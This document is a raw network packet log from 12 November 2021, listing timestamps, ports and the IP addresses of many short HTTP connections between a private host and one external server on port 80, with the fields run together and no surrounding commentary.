                          Nov 12, 2021 22:23:37.566245079 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.587712049 CET8049863178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.587979078 CET4986380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.588592052 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.588704109 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.589437962 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.611922026 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.617027998 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.617228031 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.712647915 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.712874889 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.713076115 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.713171005 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.725661993 CET4986580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.735441923 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.735465050 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.735599041 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.735601902 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.735611916 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.735625982 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.735682964 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.735745907 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.735774040 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.747956991 CET8049865178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.748074055 CET4986580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.748758078 CET4986580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.758039951 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.758044958 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.758083105 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.758105040 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.758116961 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.758243084 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.758255959 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.758258104 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.758264065 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.758275986 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.758302927 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.758366108 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.758415937 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.758439064 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.758495092 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.771200895 CET8049865178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.775949955 CET8049865178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.776026011 CET4986580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.780836105 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.780879021 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.780891895 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.780900002 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.780911922 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.780920982 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.780929089 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.780941010 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.780941963 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.780951023 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.780981064 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.781025887 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.781039000 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.781048059 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.781137943 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.781150103 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.781158924 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.781239986 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.781253099 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.781260967 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.781420946 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.803471088 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.803492069 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.803499937 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.804074049 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.806129932 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.806262970 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.891283035 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.891560078 CET4986580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.892714024 CET4986680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.913985968 CET8049864178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.914005041 CET8049865178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.914083958 CET4986480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.914109945 CET4986580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.915498018 CET8049866178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.915894985 CET4986680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.916663885 CET4986680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:37.940074921 CET8049866178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.942341089 CET8049866178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:37.945059061 CET4986680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.047844887 CET4986680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.049065113 CET4986780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.070456982 CET8049866178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.070768118 CET4986680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.071450949 CET8049867178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.071791887 CET4986780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.084495068 CET4986780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.109101057 CET8049867178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.111748934 CET8049867178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.111874104 CET4986780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.206043959 CET4986780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.207361937 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.220330954 CET4986980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.231699944 CET8049867178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.231739998 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.231858015 CET4986780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.231937885 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.232527971 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.232707977 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.232938051 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.233027935 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.246480942 CET8049869178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.247924089 CET4986980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.248425961 CET4986980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.256670952 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256684065 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256694078 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256705046 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256722927 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256732941 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256747961 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256757975 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256772995 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256783009 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256797075 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256808043 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.256956100 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.257009029 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.271027088 CET8049869178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.275011063 CET8049869178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.275259972 CET4986980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282325983 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282368898 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282416105 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282444000 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282481909 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282510042 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282519102 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282540083 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282571077 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282572031 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282588005 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282603979 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282603979 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282633066 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282649040 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282663107 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282685995 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282692909 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282715082 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282721996 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282738924 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282751083 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282761097 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282779932 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282785892 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282810926 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282839060 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282840014 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282866001 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282867908 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282882929 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282898903 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.282907963 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.282947063 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.283220053 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.306207895 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.306231022 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.306271076 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.306291103 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.306387901 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.306456089 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.307173014 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307230949 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307249069 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307262897 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.307267904 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307288885 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307301044 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.307307959 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307327032 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307357073 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307362080 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.307375908 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307405949 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307858944 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307936907 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307965994 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.307986021 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308032990 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308052063 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308079004 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308099031 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308129072 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308149099 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308167934 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308442116 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308581114 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308614969 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308638096 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308698893 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308717966 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308747053 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308765888 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308793068 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308809996 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308835983 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308883905 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.308911085 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.329555035 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.329596043 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.329703093 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.329726934 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.330357075 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.333059072 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.333080053 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.333215952 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.391035080 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.391508102 CET4986980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.393640041 CET4987080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.413891077 CET8049869178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.414030075 CET4986980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.416594028 CET8049868178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.416620016 CET8049870178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.416729927 CET4986880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.416838884 CET4987080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.417346001 CET4987080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.444250107 CET8049870178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.446469069 CET8049870178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.446808100 CET4987080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.563150883 CET4987080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.564897060 CET4987180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.585767984 CET8049870178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.585901976 CET4987080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.588011026 CET8049871178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.588908911 CET4987180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.588937044 CET4987180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.611792088 CET8049871178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.615972996 CET8049871178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.616913080 CET4987180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.718928099 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.719058990 CET4987180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.722309113 CET4987380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.741794109 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.741827011 CET8049871178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.742017031 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.742609024 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.742760897 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.742829084 CET4987180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.742964029 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.743061066 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.744807959 CET8049873178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.748130083 CET4987380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.759351015 CET4987380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.768168926 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768193960 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768223047 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768241882 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768268108 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768285990 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768311024 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768328905 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768354893 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768373966 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768399954 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768418074 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.768506050 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.768564939 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.782275915 CET8049873178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.785475016 CET8049873178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.785659075 CET4987380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.791125059 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.791148901 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.791187048 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.791213989 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.791255951 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.791318893 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.791352987 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.791398048 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.791399002 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.791424990 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.791449070 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.791476965 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.791486979 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.791518927 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.791548014 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.791553974 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.791585922 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.791631937 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.792012930 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.792042971 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.792072058 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.792130947 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.792164087 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.792191982 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.792210102 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.792246103 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.792309046 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.792329073 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.792758942 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.792793036 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.792877913 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.815787077 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.815848112 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.815861940 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.815874100 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.815885067 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.815897942 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.815908909 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.815983057 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.816004992 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.816066980 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.816164017 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.816369057 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.816917896 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.816930056 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.816942930 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817011118 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817032099 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817040920 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817048073 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817059994 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817068100 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817080021 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817138910 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817152023 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817164898 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817176104 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817188025 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817311049 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817414045 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817426920 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817439079 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817663908 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817675114 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817863941 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817874908 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817888021 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817903042 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817986965 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.817998886 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.818135977 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840378046 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840400934 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840415955 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840516090 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840532064 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840542078 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840557098 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840574026 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840584040 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840593100 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840603113 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840612888 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.840629101 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.843789101 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.844650984 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.891987085 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:38.920583963 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:38.921827078 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.032799006 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.033106089 CET4987380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.034785032 CET4987480192.168.2.4178.208.83.45
